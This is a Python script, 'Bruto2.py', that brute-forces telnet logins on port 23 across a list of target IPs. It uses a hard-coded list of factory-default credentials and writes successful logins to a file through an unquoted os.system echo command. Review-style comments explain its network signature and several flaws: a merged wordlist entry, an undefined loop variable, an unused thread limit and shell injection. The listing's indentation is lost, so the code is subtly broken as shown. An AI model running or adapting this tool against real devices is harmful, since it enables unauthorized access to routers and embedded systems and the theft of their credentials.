Bruto2.py
import sys,os,re,base64,subprocess,time,socket,telnetlib,threading, resource
from sys import stdout
# Records the wall-clock start time. `start` is not read again anywhere in the
# visible listing, so no elapsed time is ever reported.
start = time.time()
# Sets the soft limit on open file descriptors (RLIMIT_NOFILE) to 1000; the hard
# limit is passed as -1. Each worker thread opens its own socket, so this is
# presumably meant to allow many simultaneous connections (confirm).
# The `resource` module is Unix-only.
resource.setrlimit(resource.RLIMIT_NOFILE, (1000, -1))
# Telnet wordlist: "username:password" pairs of factory-default and common
# credentials. A device that still accepts any of these on port 23 needs the
# credential changed or telnet disabled.
# The first two entries are canaries rather than real guesses: Brute() refuses to
# record a hit when the username is "thisisafalsealarm" or "nope".
# Expanded Wordlist: https://github.com/milo2012/pentest_scripts/blob/master/default_accounts_wordlist/wordList_telnet.txt
combo = [
"thisisafalsealarm:thisisafalsealarm",
"nope:nope",
"root:root",
"admin:admin",
"root:",
"admin:",
"default:",
"User:admin",
"guest:12345",
"admin:1234",
"admin:12345",
"admin:password",
"ubnt:ubnt",
"guest:guest",
"user:user",
"default:OxhlwSG8",
"default:S2fGqNFs",
# No comma after the next literal, so Python joins it with the following one into
# the single entry "admin:smcadminsysadm:sysadm". Brute() uses only the first two
# ":" fields, so the pair sent is admin / smcadminsysadm, a distinctive
# string to look for in telnet session logs.
"admin:smcadmin"
"sysadm:sysadm",
"support:support",
"root:default",
"root:password",
"adm:",
"bin:",
"daemon:",
"root:cat1029",
"admin:cat1029",
"admin:123456",
"root:antslq",
"cisco:cisco",
"cisco:"
]
# Requires three positional arguments: target list, thread count, output file.
if (len(sys.argv) < 4):
print("Usage: python3 "+sys.argv[0]+" <list> <threads> <output file>")
sys.exit()
# Reads the target list named by argv[1]. (The earlier comment said this checks
# whether the output file exists; nothing in the visible code does that.)
with open(str(sys.argv[1]), "r") as f:
ips = f.readlines()
# Joining the lines and re-splitting on "\n" gives one entry per line; a file that
# ends with a newline also produces a trailing empty-string entry.
ips = ''.join(map(str, ips))
ips = ips.split("\n")
# Redundant: the `with` statement already closes the file.
f.close()
# Parsed but never referenced again in the visible listing; the launch loop at
# the bottom does not use it to cap concurrency.
threads = int(sys.argv[2])
# Later concatenated, unquoted, into a shell command inside Brute().
output_file = sys.argv[3]
# Module-level name only; Brute() assigns its own local `response`.
response = ""
# Brute(ip): tries each entry of `combo` against TCP port 23 on `ip`.
# NOTE(review): this listing has lost its indentation, so which `break` / `else`
# belongs to which statement is not shown. The comments below describe what each
# line does on its own; confirm nesting against the original file.
# Network behaviour visible here (useful when matching it in telnet or flow logs):
#   - a new raw TCP socket per credential pair, 8 s timeout, destination port 23;
#   - no telnet option negotiation and no wait for a login prompt: username and
#     password are sent blind with 1.9 s and 1.8 s sleeps, then a single recv().
def Brute(ip):
# Set to True on a match below, but never read or returned in the visible code.
Auth = False
for passw in combo:
# Splits username and password from the wordlist entry; only the first two
# ":"-separated fields are used.
username = passw.split(":")[0]
password = passw.split(":")[1]
# Starts a new connection to port 23 of the given IP (plain socket; the imported
# telnetlib is not used here).
try:
tn = socket.socket()
tn.settimeout(8)
target = ((str(ip), 23))
tn.connect(target)
# Bare except: any connection failure stops work on this host without reporting
# an error.
except:
break
# Sends the username, then the password, each terminated by "\n" and encoded as UTF-8.
try:
username += "\n"
username = bytes(username, 'utf-8')
password += "\n"
password = bytes(password, 'utf-8')
tn.send(username)
time.sleep(1.9)
tn.send(password)
time.sleep(1.8)
# Bare except again; tn.close() is not called on this path.
except:
break
# Reads up to 40960 bytes of whatever the peer has sent so far (one recv call).
try:
response = tn.recv(40960)
except:
break
# First heuristic: the login counts as successful when the received bytes contain
# "#" or "$" anywhere. This is a substring test on raw bytes, not a parsed prompt.
if (b"#" in response or b"$" in response):
# The two canary usernames are excluded, so a peer that shows a prompt character
# even for those pairs is not recorded.
if (username != b'thisisafalsealarm\n' and username != b'nope\n'):
# Appends the hit to output_file through a shell command built by string
# concatenation. ip, output_file and the str() of the bytes values (their b'...'
# repr) are interpolated unquoted, so the shell interprets any metacharacters.
# The resulting file holds harvested credentials in plain text.
os.system("echo "+str(ip)+":23 "+str(username[:-1])+":"+str(password[:-1])+" >> "+output_file+"")
print("\033[32m[\033[31m+\033[32m] \033[33mBRUTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(str(username[:-1]), str(password[:-1]), ip) + " \033[32m(Linux/UNIX shell)")
Auth = True
tn.close()
break
else:
break
# Second heuristic: "@", "%" or ">" in the response. `and` binds tighter than
# `or`, so the b"ONT" exclusion applies only to the b">" test.
elif (b"@" in response or b"%" in response or b">" in response and b"ONT" not in response ):
# Same canary exclusion, plus a filter on the failure words "invalid", "refused"
# and "failed!" in the response.
if (username != b'thisisafalsealarm\n' and username != b'nope\n' and b"invalid" not in response and b"refused" not in response and b"failed!" not in response):
# Same shell-built append as above, except that password is written without
# [:-1], so its trailing newline is part of the repr.
os.system("echo "+str(ip)+":23 "+str(username[:-1])+":"+str(password)+" >> "+output_file+"")
print("\033[32m[\033[31m+\033[32m] \033[33mBRUTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(str(username[:-1]), str(password[:-1]), ip) + " \033[32m(Router/Android/UNIX shell)")
Auth = True
tn.close()
break
else:
break
# No prompt character matched: the socket is closed.
# NOTE(review): whether the `return` below sits inside this else branch or at the
# end of the function cannot be determined from the flattened listing.
else:
tn.close()
return
# Thread class: one instance per target. It stores the IP and runs Brute() on it.
# No daemon flag is set, and the visible code never joins these threads.
class theBruto(threading.Thread):
def __init__(self, ip):
threading.Thread.__init__(self)
# Target address handed to Brute() when the thread runs.
self.ip = ip
def run(self):
Brute(self.ip)
# Starts one thread per index, without waiting for earlier threads to finish.
# The <threads> argument is not consulted, so on the network this shows up as a
# burst of concurrent outbound connections to TCP/23.
# NOTE(review): `lns` is not assigned anywhere in the visible listing.
for j in range(lns):
# Prints the index of the target being started.
print(j)
bruting = theBruto(ips[j])
bruting.start()